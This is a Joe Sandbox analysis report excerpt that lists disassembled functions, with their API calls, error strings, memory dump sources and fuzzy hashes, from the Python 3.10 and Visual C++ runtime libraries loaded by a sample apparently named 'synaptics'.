                                                                                                                                                                                                      • __index__ returned non-int (type %.200s). The ability to return an instance of a strict subclass of int is deprecated, and may be removed in a future version of Python., xrefs: 6C450F0C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: '%.200s' object cannot be interpreted as an integer$__index__ returned non-int (type %.200s). The ability to return an instance of a strict subclass of int is deprecated, and may be removed in a future version of Python.
                                                                                                                                                                                                      • API String ID: 0-3136259872
                                                                                                                                                                                                      • Opcode ID: 40e0fbfffbbdfaa451b2091febcac67f26e6bb8f71087aa068582f96d896d1fe
                                                                                                                                                                                                      • Instruction ID: 6ec8797051a47f6ff9fd69e095b82881df36d68dcb9aec2ac06417017772b200
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40e0fbfffbbdfaa451b2091febcac67f26e6bb8f71087aa068582f96d896d1fe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2201D1367012509BDB11EA54DE01F92B7A6AF8065EF64C164F90CCBB65D773E8228BC0
                                                                                                                                                                                                      Function 6C4DDC40 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyObject_CallFunction_SizeT.PYTHON310(sOnns,utf-8,00000001,00000000,?,6C4D8859,?,?,6C4DDCC7,00000001,00000000,?,6C4D8859,00000000,?,6C4D8859), ref: 6C4DDC64
                                                                                                                                                                                                      • PyUnicodeEncodeError_SetReason.PYTHON310(?,6C4D8859,?,?,6C4DDCC7,00000001,00000000,?,6C4D8859,00000000,?,6C4D8859,?,00000000,00000001,surrogates not allowed), ref: 6C4DDC7E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallEncodeError_Function_Object_ReasonSizeUnicode
                                                                                                                                                                                                      • String ID: sOnns$utf-8
                                                                                                                                                                                                      • API String ID: 1387825242-3801526669
                                                                                                                                                                                                      • Opcode ID: 924bbc6c5db13c16d248e6f0b0655a68521bf2ac5cd0b693019e4e0f935edb03
                                                                                                                                                                                                      • Instruction ID: 289450218f3ebebe440b5937388f83cfe362a5e9075a8e21bc9178d0e817571d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 924bbc6c5db13c16d248e6f0b0655a68521bf2ac5cd0b693019e4e0f935edb03
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25018FB1600205ABDF14EFA9EC10D9537B5EF4432AF14416CF85C86B50D332D861CFA0
                                                                                                                                                                                                      Function 6C5B0C60 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyObject_Dump.PYTHON310(00000000,00000000,?,6C5B0103,00000000,?,?), ref: 6C5B0C7D
                                                                                                                                                                                                        • Part of subcall function 6C4A2530: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,object address : %p,?), ref: 6C4A25A2
                                                                                                                                                                                                        • Part of subcall function 6C4A2530: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,object refcount : %ld,?), ref: 6C4A25B9
                                                                                                                                                                                                        • Part of subcall function 6C4A2530: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C4A25C9
                                                                                                                                                                                                        • Part of subcall function 6C4A2530: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C4A25CF
                                                                                                                                                                                                        • Part of subcall function 6C4A2530: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,object type : %p,?), ref: 6C4A25E3
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,lost sys.stderr,?), ref: 6C5B0C8C
                                                                                                                                                                                                        • Part of subcall function 6C3F3C50: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,6C4A5FC5,?,00000000,?,?,6C4A5FC5,00000000), ref: 6C3F3C6C
                                                                                                                                                                                                      • _PyErr_Display.PYTHON310(00000001,?,00000000,6C5B0103,00000000,?,6C5B0103,00000000,?,?), ref: 6C5B0CB5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func$DisplayDumpErr_Object___stdio_common_vfprintffflush
                                                                                                                                                                                                      • String ID: lost sys.stderr
                                                                                                                                                                                                      • API String ID: 1712327883-1602404429
                                                                                                                                                                                                      • Opcode ID: 89f65e45876795b0e8056482d6926e239e1646c9746245bcf426fa6752ab2b73
                                                                                                                                                                                                      • Instruction ID: f996a6bfda94becff76a2e488c1f6d0273abd0f684c0af01c62a77893fbf8b07
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89f65e45876795b0e8056482d6926e239e1646c9746245bcf426fa6752ab2b73
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12F04CB2940218ABCB112F94ED25CDA7B689F5033DF014525FC5C66F61D731FA648BD2
                                                                                                                                                                                                      Function 73A86655 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _FindAndUnlinkFrame.VCRUNTIME140(?,73A8663D), ref: 73A86661
                                                                                                                                                                                                      • _IsExceptionObjectToBeDestroyed.VCRUNTIME140(?,73A8663D), ref: 73A866B3
                                                                                                                                                                                                      • __DestructExceptionObject.VCRUNTIME140(00000001,?,73A8663D), ref: 73A866C9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionObject$DestroyedDestructFindFrameUnlink
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 1567117672-1018135373
                                                                                                                                                                                                      • Opcode ID: d7279898b3af8156b5381652d84c91a6283b3fa80aa7237fe2623117e273f108
                                                                                                                                                                                                      • Instruction ID: b4da4c149a2c6c18ff46ca98589e12acfb6ff4369bdc624292f042ce1e5e6354
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7279898b3af8156b5381652d84c91a6283b3fa80aa7237fe2623117e273f108
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC010C35801355EBEB1A8F60E602BA8BB79BF04211F54012FD902067A4DB7AD690DE91
                                                                                                                                                                                                      Function 6C550C00 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_CheckRecursiveCall.PYTHON310(?,?), ref: 6C550C28
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyThreadState_Get), ref: 6C550C44
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallCheckError_FatalRecursiveTstate
                                                                                                                                                                                                      • String ID: PyThreadState_Get
                                                                                                                                                                                                      • API String ID: 1322656323-1068966796
                                                                                                                                                                                                      • Opcode ID: 1cf446ec3bc66835024bf4a5a052e56c237fa4bacb93c28e9ba635ab53946fad
                                                                                                                                                                                                      • Instruction ID: a4e67111a09f62a78c653691e7f23b07a402c061ef9070a151dcf0f4df3b8694
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1cf446ec3bc66835024bf4a5a052e56c237fa4bacb93c28e9ba635ab53946fad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DE09A3820034A9F8B08DF68CD80DA1B376BFD6348764CC86E81147E06CB30E990EBE1
                                                                                                                                                                                                      Function 6C5BD9B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromFormat.PYTHON310( [Previous line repeated %ld more times],-00000003,?,00000000,6C5BDC47,-000000FF), ref: 6C5BD9C9
                                                                                                                                                                                                        • Part of subcall function 6C4D4430: PyUnicode_FromFormatV.PYTHON310(6C4B758E,?,?,6C4A27B9,<%s object at %p>,?,6C4B758E,?,6C4B758E,?), ref: 6C4D443D
                                                                                                                                                                                                      • PyFile_WriteObject.PYTHON310(00000000,?,00000001,00000000,000003E8,?,?,?,?,?,?,?,6C5BDD58,000003E8), ref: 6C5BD9E1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • [Previous line repeated %ld more time], xrefs: 6C5BD9BF
                                                                                                                                                                                                      • [Previous line repeated %ld more times], xrefs: 6C5BD9B4, 6C5BD9C8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FormatFromUnicode_$File_ObjectWrite
                                                                                                                                                                                                      • String ID: [Previous line repeated %ld more time]$ [Previous line repeated %ld more times]
                                                                                                                                                                                                      • API String ID: 1031982583-855212737
                                                                                                                                                                                                      • Opcode ID: 5557d2d10bfe9c048a4ce92984d809deab5bae9d1778f603124fafe6af185ad5
                                                                                                                                                                                                      • Instruction ID: bf0486fab93ff76d0e6b79f7fae2fb143a905232d459579c00f24f1b3feac1f3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5557d2d10bfe9c048a4ce92984d809deab5bae9d1778f603124fafe6af185ad5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F0E532A4451017CA14523DBD05CD6369A8FC1735B19433DE4689FBC4DA64EC8782E1
                                                                                                                                                                                                      Function 6C5B7D20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(flags,-000000FF,tXl,6C5BB89A), ref: 6C5B7D31
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FromStringUnicode_
                                                                                                                                                                                                      • String ID: flags$tXl
                                                                                                                                                                                                      • API String ID: 2818169177-108894673
                                                                                                                                                                                                      • Opcode ID: 71d54d80bb80aeace418718f0761beeed0262395f0563abe69cc4a82bd534f03
                                                                                                                                                                                                      • Instruction ID: 28040f6455bdf7cb89c5345e0f9f3cba22afd36f7a69c59ba17566b89272e731
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71d54d80bb80aeace418718f0761beeed0262395f0563abe69cc4a82bd534f03
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBE0E53770411007C261852EBC109EB26EA8FC16B4719033EE8599B340D664D84782F1
                                                                                                                                                                                                      Function 6C450CD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C450CF1
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • bad operand type for unary -: '%.200s', xrefs: 6C450D17
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C450CE5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectString
                                                                                                                                                                                                      • String ID: bad operand type for unary -: '%.200s'$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 1622067708-3866959385
                                                                                                                                                                                                      • Opcode ID: d21908c0a1c475934dfb0d8c497b73eca9d57b238f5b6e3e6608bb32e780ffa1
                                                                                                                                                                                                      • Instruction ID: 33251be4138684a15672c1c7a9b19b9457b483f966022ae5d8a3ccb4b9dad9d4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d21908c0a1c475934dfb0d8c497b73eca9d57b238f5b6e3e6608bb32e780ffa1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABF08235745249DFEF04CE65E845E2977B6EB9020EB548068E80C87F11E731E864DB90
                                                                                                                                                                                                      Function 6C450D30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C450D51
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C450D45
                                                                                                                                                                                                      • bad operand type for unary +: '%.200s', xrefs: 6C450D77
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectString
                                                                                                                                                                                                      • String ID: bad operand type for unary +: '%.200s'$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 1622067708-2582373171
                                                                                                                                                                                                      • Opcode ID: 991a0921379a551aac727648a678825bf9decf889695a7ff153024633fa9ff7d
                                                                                                                                                                                                      • Instruction ID: 70b831a4a27b071858ec68149eac4b8a10f7c66644ab3cc8dc82ed05525bf515
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 991a0921379a551aac727648a678825bf9decf889695a7ff153024633fa9ff7d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78F05E35705248DFEF44DE61E845E2577B5AF8064EB548568E81887F21E731E8658B80
                                                                                                                                                                                                      Function 6C450DF0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C450E11
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C450E05
                                                                                                                                                                                                      • bad operand type for abs(): '%.200s', xrefs: 6C450E37
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
